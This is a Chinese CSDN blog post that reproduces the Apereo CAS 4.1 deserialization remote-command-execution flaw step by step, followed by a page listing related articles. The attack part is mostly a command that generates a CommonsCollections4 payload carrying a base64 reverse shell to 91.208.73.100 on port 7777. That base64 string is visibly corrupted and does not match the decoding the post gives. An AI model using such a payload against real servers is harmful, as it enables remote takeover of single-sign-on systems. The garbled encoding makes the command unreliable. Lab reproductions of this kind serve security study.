apereo-cas 命令执行 4.1

于 2024-07-17 14:03:39 发布
阅读量117 收藏
点赞数 1
分类专栏: # 反序列化 # 命令执行 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140489941
版权

一、漏洞概述

Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。

二、影响范围

4.1.7版本之前

三、访问页面

四、漏洞复现

1、访问地址/cas/login,输入任意账号密码登录并使用burp抓包。

2、下载apereo-cas-attack-1.0-SNAPSHOT-all.jar。

https://github.com/vulhub/Apereo-CAS-Attack/releases

3、生成反弹shell

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvkjfdkL3RjcC85MS4yMDguNzMuMTA4Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}"

其中
YmFzaCAtaSA+JiAvkjfdkL3RjcC85MS4yMDguNzMuMTA4Lzc3NzcgMD4mMQ==

是 bash -i >& /dev/tcp/91.208.73.100/7777 0>&1 的baise64编码

4、复制生成的payload到burp,修改execution的值。

5、在vps上监听7777端口,成功了flag呢?

风中追风-fzzf
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apereo CAS 4.1 反序列化命令执行漏洞复现遇到的问题及解决过程
deinghwl的博客
07-30 480
1,在搭建vulhub环境时,使用pip安装的docker-compose版本可能有问题,导致后续在启动容器时报错TypeError: kwargs_from_env() got an unexpected keyword argument ‘ssl_version‘,这是因为docker和docker-compose版本不兼容导致的,解决方法是重新下载一个正确版本的docker-compose(可以使用命令docker -v查看docker版本,然后在网上查询对应兼容的docker-compose版本)
Apereo CAS5.2.3 自定义登录页,验证码,扩展开发,注册功能
04-25
完整项目在https://download.csdn.net/download/u010588262/10327539 这个资源是新增功能之后的main文件夹 对应博客系列:https://blog.csdn.net/u010588262/article/category/7548325 对应博客这篇:https://blog.csdn.net/u010588262/article/details/80014083
【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现
qq_45300786的博客
09-12 684
楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 一、先跑下目录 二、生成payload http://www.jackson-t.ca/runtime-exec-payloads.html 工具链接:https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar 三、dnslog回显 ja
Apereo CAS 4.1 反序列化命令执行漏洞复现
HEAVEN569的博客
06-21 394
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。...
apereo-cas 4.1 反序列化命令执行漏洞 复现
YouthBelief的博客
11-22 1549
所有文章,仅供安全研究与学习之用,后果自负! apereo-cas 命令执行 4.1 apereo-cas 命令执行 4.10x01 漏洞描述0x02 影响范围0x03 漏洞复现漏洞检测漏洞利用0x04 漏洞修复 apereo-cas 命令执行 4.1 0x01 漏洞描述 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 0x02 影响范围 A
java-cas-client:Apereo Java CAS客户端
02-03
Java Apereo CAS客户端介绍这是Java Apereo CAS客户端的官方主页。 客户端由一系列Servlet过滤器组成,这些过滤器...建立 git clone git@github.com:apereo/java-cas-client.gitcd java-cas-clientmvn clean package
apereo cas6.3.2可执行war,集成mysql的jdbc认证模块
03-28
Apereo CAS 6.3.2 是一个广泛使用的开源单点登录(Single Sign-On, SSO)服务器,基于 Java 技术栈构建,特别适用于教育和企业环境。它提供了安全的身份验证和授权服务,允许用户通过单一登录界面访问多个应用程序。...
cas-security-spring-boot-starter:用于Apereo CAS客户端的Spring Boot Starter与Spring Security完全集成
01-30
Spring Security CAS启动器 ... < artifactId>cas-security-spring-boot-starter < version>1.0.6 但是请注意,如果您来自0.xx版本,则1.xx版本会有一些重大更改。 请检出 ,尤其是breaking changes
cas4.1.x集成 cas4.1.x集成
06-02
cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x...
connect-cas2:CAS(中央身份验证服务)客户端的NodeJS实现
02-05
连接cas2 用于Express / Connect的CAS客户端中间件的完整实现,支持CAS 2.0+协议。 CAS(中央身份验证服务)是Web的单点登录/单点退出协议。 我们假设您已经熟悉CAS协议,如果不熟悉,请在使用前阅读本。 安装 ...
统一认证 - Apereo CAS 简介
weixin_34392906的博客
02-03 258
为什么要做这个尝试? 微服之道,方兴未艾;农之来学者,盖已千者! 这句是从《陶山集·太学案问》瞎改出来的。意思就是微服务的架构理念还在不断地发展,现在整个啥都 言必出微服务,差点都到了 没学过微服务的码农不是一个好码农。搞到微服务这个词都快跟区块链差不多臭了。 在将臭未臭之前,我们赶紧把其中的统一认证这块过一下。 在微服务的概念中,恨不...
apereo cas mysql_统一认证 - Apereo CAS 小试
weixin_36270006的博客
01-26 293
做这些尝试的时候,Apereo CAS比较稳定的版本是5.3.x,使用如果想按照这个文章搭设的话,最好采用相同的版本Apereo CAS单机版的搭设Apereo CAS秉承耶鲁的自由文化传统,整个产品高度自由化,哪哪都提供了极其灵活的使用方式。比如单机版的部署,一般的软件提供的单机版都是下载一来,运行某个文件就直接开跑的。Apereo就不同,即使是单机版,也要配置一些内容才可以运行的。不单单是配置...
Apereo CAS Client
lemon
05-17 211
基于apereo/java-cas-client做了自定义功能,根据请求是否是Ajax请求或指定参数返回登录报文而不是直接重定向。传送门
Apereo Cas在项目中接入
最新发布
qq_32323239的博客
12-16 1496
Apereo CAS的一个功能就是单点登录,统一的登录登出接口与页面,让系统中的模块只需要关注在业务点,而把安全认证的功能交给统一认证来做。所以客户端的集成主要是单点登录的集成,客户端指定需要做安全认证的页面,然后Apereo CAS安全包检测校验用户登录情况,并自动与CAS登录页面进行跳转交互。1、用户访问CAS Client请求资源2、客户端程序做了重定向,重定向到CAS Server。
CASApereo CAS 简介(一)
diandiao3845的博客
03-27 588
CASApereo CAS 简介(一) Background(背景) 随着公司业务的不断扩展,后台接入子系统不断增多,那么我们将针对不同的平台进行拆分为各自对应的子系统, 权限是不变的,那么我们不能每个子系统都单独进行登录认证,不然管理人员进行切换系统时会疯掉。 那么,经过考察选用开源框架 Apereo CAS , 选定版本为 5.2.0。目前系统已在线,并已稳定。 接下来我会将系...
apereo cas mysql_cas5.3.1 从搭建到连接mysql(简而优美)
weixin_42620563的博客
01-19 222
前言:cas是单点登录服务框架,为单点登录业务提供了便捷服务,它分为client,server端,client端要聚合到我们自己的项目。server端要单独构建运行,本篇文章主要讲解一下cas5.3.1 server端构建和运行,以及对mysql的支持。1 源码下载cas的源码有很多版本 这里我选用的是maven最新版源码地址:https://github.com/apereo/cas-overl...
Apereo CAS实现单点登录(sso)
呆大王的博客
03-08 3113
文章目录一什么是单点登录(sso)二什么是CASCAS Server3.1下载与部署cas的war包3.2启动tomcat查看cas Server是否安装成功3.3CAS Server其它功能演示四CAS 客户端五CAS 认证流程 一什么是单点登录(sso) 用户一次登录可以访问所有互相信任的应用系统 传统的session无法在系统分别部署到不同的服务器中使用 二什么是CAS 是实现SSO单点登录的框架 点击进入CAS官网: 特点 开源企业级单点登录解决方案 CAS Service(CAS服务端): 是
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值